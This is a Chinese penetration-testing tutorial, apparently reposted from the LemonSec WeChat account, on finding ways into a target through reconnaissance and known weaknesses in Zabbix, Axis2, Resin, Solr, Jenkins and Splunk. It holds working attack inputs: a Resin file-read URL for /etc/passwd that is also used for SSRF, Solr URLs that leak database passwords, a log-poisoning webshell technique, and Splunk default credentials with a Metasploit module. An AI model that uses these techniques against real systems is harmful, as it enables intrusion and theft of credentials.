渗透实战过程中突破口寻找的方法

  • A+
所属分类:安全文章

渗透实战过程中突破口寻找的方法

0x00 寻找目标


渗透实战过程中突破口寻找的方法



常用思路


1.网段信息

 


渗透实战过程中突破口寻找的方法

./dnsmap target-domain.com -w 你的域名字典 -r 要保存结果文件的绝对路径
针对做了泛解析的域名可以使用-i 需忽略ip来避免误报,如对域名xxx.com的暴破过程中不存在域名都解析到1.1.1.1上,则使用命令为./dnsmap xxx.com -w domain.txt -i 1.1.1.1 -r /tmp/result.txt
结果为如下格式:

渗透实战过程中突破口寻找的方法

 

渗透实战过程中突破口寻找的方法



渗透实战过程中突破口寻找的方法

 

其中zabbix.nb.xxx.com这个站点暴露到了外网,版本较低,使用zabbix的注入漏洞成功获取权限

渗透实战过程中突破口寻找的方法

 

同时子域名也可通过搜索引擎语法site:xxx.com收集(不断增加条件,可获取的更多,如inurl,intitle等等)

谷歌语法大全:https://github.com/xuanhun/HackingResource/blob/master/web%E5%AE%89%E5%85%A8/google%20hack%20%E4%B9%8Bsql%E6%B3%A8%E5%85%A5.md


2)AS号

Jwhois使用方法

yum install -y jwhois

执行

whois -h asn.shadowserver.org origin 1.1.1.1

可获得ip所在企业的AS号,继续执行

whois -h asn.shadowserver.org prefix as号

即可获得该as号对应网段

注:一般只有大企业才会有as号,并且一个企业可能会有多个as号

渗透实战过程中突破口寻找的方法


3)DNS  

渗透实战过程中突破口寻找的方法


4)spf记录

渗透实战过程中突破口寻找的方法

渗透实战过程中突破口寻找的方法

 

如何判断cdn?

如果误把cdn的ip加到目标里会影响一些人工时间,如何判断cdn?最简单的方法是用多地ping功能

http://ping.chinaz.com/


渗透实战过程中突破口寻找的方法

 

2.利用whatweb寻找web入口


使用方法

./whatweb 1.1.1.1/24 --log-brief=output_file(详细使用参考使用说明)



渗透实战过程中突破口寻找的方法



渗透实战过程中突破口寻找的方法

渗透实战过程中突破口寻找的方法

 

操作历史中发现有打包文件且放在web目录下

渗透实战过程中突破口寻找的方法

 

下载打包文件,内容如下

渗透实战过程中突破口寻找的方法

 

其中发现有log文件,且log文件会记录user-agent信息

渗透实战过程中突破口寻找的方法

 

使用firefox插件User Agent Switcher更改user-agent信息

 

渗透实战过程中突破口寻找的方法

一句话代码写入log文件后利用解析漏洞直接获取webshell

渗透实战过程中突破口寻找的方法

 

3.利用nmap寻找可利用服务


详细用法参考使用手册,个人常用命令为(-P0参数视情况添加,如果没有禁ping可以不加,提升速度)

./nmap -sT -sV 1.1.1.1/24 -P0 -oN /tmp/port_result.txt --open
Ip较少的情况下可以扫全端口以及一些基本信息
./nmap -sT -sV -p 1-65535 1.1.1.1 -P0 -A


渗透实战过程中突破口寻找的方法


4.利用搜索引擎寻找后台或重要系统



渗透实战过程中突破口寻找的方法

site:baidu.com inurl:login -site:zhidao.baidu.com


5.搞一个精简的路径字典

我们可以把容易出问题且危害比较高的常见路径做成一个精简的小字典,针对之前收集的域名去遍历,比如/invoker/JMXInvokerServlet、wwwroot.zip这种,发现的话很大几率可以搞到权限


0x01 利用


这里列出几个常见的系统利用方法


渗透实战过程中突破口寻找的方法



渗透实战过程中突破口寻找的方法


渗透实战过程中突破口寻找的方法

www.xxx.com/axis2/axis2-admin/ 登陆管理后台

后台部署文件代码执行:

使用metasploit

渗透实战过程中突破口寻找的方法

 

Resin

文件读取:

http://www.xxx.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd


渗透实战过程中突破口寻找的方法

 

也可以通过

http://www.xxx.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://1.1.1.1

实现SSRF


solr敏感信息泄漏

http://xxx.org:8080/solr/admin/file/?file=solrconfig.xml

搜索xml文件,找到data-import.xml

渗透实战过程中突破口寻找的方法

 

访问http://xxx.org:8080/solr/admin/file/?file=data-import.xml获取数据库密码

渗透实战过程中突破口寻找的方法

 

Hudson(jenkins类似)

参考 :

搜狐某应用远程Groovy代码执行https://www.uedbox.com/post/41552/



渗透实战过程中突破口寻找的方法


 应用汇zabbix运维不当导致任意命令执行 https://www.uedbox.com/post/36772/


渗透实战过程中突破口寻找的方法

渗透实战过程中突破口寻找的方法

 

默认账户admin/changeme  默认端口8000

渗透实战过程中突破口寻找的方法

 

管理器-应用-从文件安装应用处可获得shell

渗透实战过程中突破口寻找的方法

 

msf有利用模块

exploit/multi/http/splunk_upload_app_exec

渗透实战过程中突破口寻找的方法


一如既往的学习,一如既往的整理,一如即往的分享。感谢支持渗透实战过程中突破口寻找的方法

【好书推荐】


渗透实战过程中突破口寻找的方法

渗透实战过程中突破口寻找的方法

2020hw系列文章整理(中秋快乐、国庆快乐、双节快乐)

HW中如何检测和阻止DNS隧道

ctf系列文章整理

日志安全系列-安全日志

【干货】流量分析系列文章整理

【干货】超全的 渗透测试系列文章整理

【干货】持续性更新-内网渗透测试系列文章

【干货】android安全系列文章整理



扫描关注LemonSec

渗透实战过程中突破口寻找的方法

渗透实战过程中突破口寻找的方法


本文始发于微信公众号(LemonSec):渗透实战过程中突破口寻找的方法

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: